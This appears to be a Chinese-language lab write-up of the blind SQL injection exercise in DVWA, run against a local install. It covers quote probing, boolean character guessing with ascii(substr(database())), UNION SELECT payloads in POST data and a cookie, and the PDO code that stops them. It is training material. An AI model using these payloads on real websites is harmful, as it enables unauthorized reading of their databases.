1.初级篇 Low.php
加单引号提交
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘&Submit=Submit#
输出用户id没有找到
select first_name from users where user_id=1; #Success Return admin select first_name from users where user_id="1‘"; #Success Return admin select first_name from users where user_id=‘1‘‘; #Fail select first_name from users where user_id=(1‘); #Fail select first_name from users where user_id=((1‘)); #Fail
select first_name from users where user_id=((‘1‘‘)); #Fail
说明不是用双引号闭合的,尝试一下发现是单引号闭合
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘%23&Submit=Submit#
构造如下注入,若database名第一个字符为‘d‘,即ascii码为100,页面正常
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘ and ascii(substr(database(),1,1))=100%23&Submit=Submit#
反之页面不正常
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘ and ascii(substr(database(),1,1))=99%23&Submit=Submit#
2.中级篇 Medium.php
POST 提交
id=0 union select 1,2#&Submit=Submit
仍然显示存在,事实上id=0并不存在,但union select 返回了结果,程序只是单纯的判断结果集是否为空
和初级篇一样,猜字符
id=1 and ascii(substr(database(),1,1))=100#&Submit=Submit
3.高级篇 High.php
和上一章不同,这次是写入了cookie
http://localhost/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php
刷新
http://localhost/DVWA-master/vulnerabilities/sqli_blind/
使用EditThisCookie查看cookie
可以直接在这个页面直接注入
0‘ union select 1,2#
刷新页面
4.不可能篇 Impossible.php
查看源码就知道使用PDO,无法注入
if(is_numeric( $id )) { // Check the database $data = $db->prepare( ‘SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;‘ ); $data->bindParam( ‘:id‘, $id, PDO::PARAM_INT ); $data->execute();